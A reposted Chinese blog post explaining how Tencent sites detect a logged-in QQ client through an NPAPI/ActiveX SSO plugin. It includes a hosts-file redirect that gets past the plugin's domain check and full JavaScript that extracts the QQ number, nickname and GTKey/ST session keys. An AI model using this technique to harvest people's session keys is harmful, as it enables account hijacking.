在 QQ 已经登录的情况下,手动输入网址打开 QQ 邮箱 或者 QQ 空间 等腾讯网站,可以看到网页已经检测到本地 QQ 客户端已经登录,于是用户可以很方便地一键登录网站而不必再输入用户名密码。

这实际上是典型的异构系统单点登录 SSO(single-sign-on)技术。 网页怎么会知道我登录的 QQ 号码? 腾讯是如何实现的呢?

网上有很多猜测,比如:

  1. QQ 登录时在本地某地方存登录 ID 信息(Cookie 或文件),用 js 读,然后去服务器认证。但是现在的浏览器一般有沙箱功能,js 无法读到登录 ID;而且在清空 Cookie 后依然起作用。
  2. 以 IP、CPU ID、硬盘 ID 等硬件设备 hash 做唯一标识,QQ 登录时在服务器记录此信息,js 验证。感觉这样依赖环境过多,QQ 不太可能采用此方法。
  3. QQ 启动某端口监听,js 连接此端口。但是用 netstat 查看后,QQ 并没有监听端口。

有这么一个神奇的链接,http://xui.ptlogin2.qq.com/cgi-bin/qlogin你一点开,它就检测到你登录了 QQ。通过查看页面源代码,我们可以发现一个关于 ptlogin 的 js文件,这段代码中,描述了使用 ActivexObject 浏览器插件的过程,于是一切了然。

可是 ActiveX 是 IE 的插件呀,我们使用 Chrome 或者 FireFox 也是可以直接登录的,这是怎么回事呢?

原来,QQ 使用了历史很悠久的 NPAPI(Netscape Plugin Application Programming Interface)接口。NPAPI 几乎支持所有主流浏览器,包括 FireFox、Chrome、Opera(IE 从 5.5 后停止支持 NPAPI,转而使用 ActiveX)。

打开 chrome://plugins/ 我们可以发现自动登录的有关插件,而在路径 C:\Program Files (x86)\Common Files\Tencent\TXSSO 下就可以找到关于 SSO 的相关动态链接库。

np 插件一般命名都会加np前缀 如 QQ 的这个 npSSOAxCtrlForPTLogin.dll,只要按照标准的写法(NPAPI插件编程起步),放在浏览器会加载的地方,用的时候写个标签就可以在 js 里面调用了。于是跨浏览器(无视 IE)的插件开发变得相当可行。运行在 NPAPI 插件中的代码拥有当前用户的所有权限,不在沙箱中运行,所以它的扩展程序在被 Chrome 网上应用店接受前要求人工审核。(不过今年年底Chrome将完全移除对NPAPI的支持,转而推广自己的NACL)@mozafish

有点不怀好意的想法开始萌生,我自己的网站能否借用这个插件来检测用户的 QQ 登录呢?

由于本地打开此页面,create ActiveXObject 会加载失败。腾讯在 dll 中就对域名进行了限制,网页是无法篡改的。须改本地host文件,加一条:

127.0.0.1 xui.ptlogin2.qq.com
<!DOCTYPE html>

<html>

<head>

<meta charset="utf-8">

<title>Tencent SSO Testing</title>

</head>

<body>

<script>

var g_vOptData;

var mylocation= "xui.ptlogin2.qq.com/cgi-bin1/qlogintest.html";

var pt = {

 ishttps: false,

 low_login: 0,

 keyindex: 9,

 init: function()

 {

  pt.ishttps = /^https/.test(mylocation);

  //if (navigator.mimeTypes["application/nptxsso"]) {

  var B = document.createElement("embed");

  B.type = "application/nptxsso";

  B.style.width = "0px";

  B.style.height = "0px";

  document.body.appendChild(B);

  pt.sso = B

 }

};

pt.init();

try {

 if (window.ActiveXObject)

 {

  q_hummerQtrl = new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");

  var A = q_hummerQtrl.CreateTXSSOData();

  q_hummerQtrl.InitSSOFPTCtrl(0, A);

  g_vOptData = q_hummerQtrl.CreateTXSSOData()

 }

 hummer_loaduin();

} catch(B) {

 alert(/create ActiveXObject failed/)

}

function hummer_loaduin()

{

 if (window.ActiveXObject)

 {

  var Y = q_hummerQtrl.DoOperation(1, g_vOptData);

  if (null == Y) {

   return

  }

  try

  {

   var T = Y.GetArray("PTALIST");

   var c = T.GetSize();

   var X = "";

   for (var d = 0; d < c; d++)

   {

    var E = T.GetData(d);

    var a = E.GetDWord("dwSSO_Account_dwAccountUin");

    var J = "";

    var O = E.GetByte("cSSO_Account_cAccountType");

    var b = a;

    if (O == 1)

    {

     try

     {

      J = E.GetArray("SSO_Account_AccountValueList");

      b = J.GetStr(0)

     } catch(Z) {}

    }

    var Q = 0;

    try {

    Q = E.GetWord("wSSO_Account_wFaceIndex")

    } catch(Z) {

    Q = 0

    }

    var S = "";

    try {

    S = E.GetStr("strSSO_Account_strNickName")

    } catch(Z) {

    S = ""

    }

    var F = E.GetBuf("bufGTKey_PTLOGIN");

    var G = E.GetBuf("bufST_PTLOGIN");

    var N = "";

    var A = G.GetSize();

    for (var W = 0; W < A; W++) {

    var B = G.GetAt(W).toString("16");

    if (B.length == 1) {

    B = "0" + B

    }

    N += B

    }

    var M = {

     uin: a,

     name: b,

     type: O,

     face: Q,

     nick: S,

     key: N

    };

    var str = "QQinfo\r\n"+

        "uin:" + M['uin']+"\r\n"+

        "name:"+M['name']+"\r\n"+

        "type:"+M['type']+"\r\n"+

        "face:"+M['face']+"\r\n"+

        "nick:"+M['nick']+"\r\n"+

        "key:"+M['key']+"\r\n";

    alert(str);

    q_aUinList[d] = M

   }

  } catch(Z) {}

  } else

  {

  try {

   var M = pt.sso;

   var L = M.InitPVA();

   if (L != false)

   {

    var I = M.GetPVACount();

    for (var W = 0; W < I; W++)

    {

     var C = M.GetUin(W);

     var D = M.GetAccountName(W);

     var K = M.GetFaceIndex(W);

     var U = M.GetNickname(W);

     var P = M.GetGender(W);

     var V = M.GetUinFlag(W);

     var f = M.GetGTKey(W);

     var R = M.GetST(W);

    }

    var str = "QQinfo\r\n"+

        "uin:" + C +"\r\n"+

        "name:"+D+"\r\n"+

        "face:"+K +"\r\n"+

        "nick:"+U+"\r\n"+

        "key:"+f+"\r\n";

    alert(str);

   }

  } catch(Z) {}

  }

}

</script>

</body>

</html>

来源:IT牛人博客聚合

腾讯的网站是如何检测到你的 QQ 已经登录?的更多相关文章

  1. 腾讯的网站如何检测到你的 QQ 已经登录?

    转:http://www.lovelucy.info/tencent-sso.html 在 QQ 已经登录的情况下,手动输入网址打开 QQ 邮箱 或者 QQ 空间 等腾讯网站,可以看到网页已经检测到本 ...

  2. 网站WAF的检测

    [wafw00f]: 项目地址: https://github.com/sandrogauci/wafw00f WAFW00F是识别和指纹Web应用防火墙(WAF)产品,其工作原理是首先通过发送一个正 ...

  3. JS版本网站资源状态检测

    Title:JS版本网站资源状态检测  --2012-08-28 14:08 前几天需要一个网站状态检测的东东,后面写了个蹩脚的JS版本,里面用到了以前没用过的东西,在这里记下来,其实批处理加curl ...

  4. 基于jQuery实现的腾讯互动娱乐网站特效

    分享一款基于jQuery实现的腾讯互动娱乐网站特效.腾讯互动娱乐网站jQuery特效是一款右侧带伸缩选项卡,支持鼠标滚轮滚动切换特效代码.效果图如下: 在线预览   源码下载 实现的代码. html代 ...

  5. 腾讯ISUX网站的一个小问题

    腾讯isux网站的一个小问题. 它的网站:http://isux.tencent.com/?variant=zh-hans     优秀的网站和差的网站的距离往往就在于细节.   浏览环境:谷歌.   ...

  6. 在自己的网站上实现QQ授权登录

    最近在实现QQ授权登录,现将我的实现过程以及我的理解整理如下.以下所述如有不对之处,请指正. 官方提供的SDK有:JS,PHP,Java.我的网站使用Scala+Play搭建的,所以只能用JS SDk ...

  7. web网站使用qq第三方登录

    Html代码: <a href=’/QQlogin’>qq登录</a> //后台代码: @RequestMapping(value = "/QQlogin" ...

  8. 【腾讯敏捷转型No.8】你爱上手机QQ了么?

    上一篇文章<QQ邮箱如何利用敏捷做到中国第一>,“QQ邮箱之母”马化腾带领QQ邮箱团队,从流量思维向产品思维转变,“QQ邮箱之父”张小龙也是在这个敏捷转型过程中,剔除固有的成见,激发对优秀 ...

  9. 腾讯云 网站开启HTTPS

    下图是我站点的初始化样子,可以看到只是输出一个字符串,啥也没有,并且没有https. 这无所谓,因为我们的重点是https,而不是网站内容 接下来就是配置https的关键步骤了,其实只需要三步而已: ...

随机推荐

  1. python 之sqlite3库学习

    # -*- coding:utf-8 -*- # 导入SQLite驱动:>>> import sqlite3# 连接到SQLite数据库# 数据库文件是test.db# 如果文件不存 ...

  2. Python decorator装饰器

    问题: 定义了一个新函数 想在运行时动态增加功能 又不想改动函数本身的代码 通过高阶段函数返回一个新函数 def f1(x): return x*2 def new_fn(f): #装饰器函数 def ...

  3. CentOS6.9 安装OpenResty

    1.安装依赖包 yum install -y gcc gcc-c++ readline-devel pcre-devel openssl-devel tcl perl 2.安装OpenResty 首先 ...

  4. 在oracle中varchar和varchar2有什么区别?

    1.varchar2把所有字符都占两字节处理(一般情况下),varchar只对汉字和全角等字符占两字节,数字,英文字符等都是一个字节:2.VARCHAR2把空串等同于null处理,而varchar仍按 ...

  5. nginx+keepalived高可用服务器宕机解决方案

    http://blog.51cto.com/gdutcxh/2109841 https://blog.csdn.net/winsonyuan/article/details/52784988

  6. android拾遗——Android 动画学习笔记

    3.0以前,android支持两种动画模式,tween animation,frame animation,在android3.0中又引入了一个新的动画系统:property animation,这三 ...

  7. markdown转换为html

    想要自己实现markdown编辑器,欲使用markdown-it作为编辑器,有着比较多的插件,可以实现代码高亮以及对数学公式转换等功能. // Activate/deactivate rules, w ...

  8. 8-3 4Values Whose Sum is Zero 和为0的四个值

    给定四个n元素集合 ABCD   要求分别从中取一个元素 abcd   使得他们的合为0   问有多少中取法 map果然炸了 #include<bits/stdc++.h> using n ...

  9. pygame模块参数汇总(python游戏编程)

    一.HelloWorld pygame.init() #初始函数,使用pygame的第一步: pygame.display.set_mod((600,500),0,32) #生成主屏幕screen:第 ...

  10. 全文搜索引擎 Elasticsearch (二) 使用场景

    1.场景—:使用Elasticsearch作为主要的后端 传统项目中,搜索引擎是部署在成熟的数据存储的顶部,以提供快速且相关的搜索能力.这是因为早期的搜索引擎不能提供耐用的​​存储或其他经常需要的功能 ...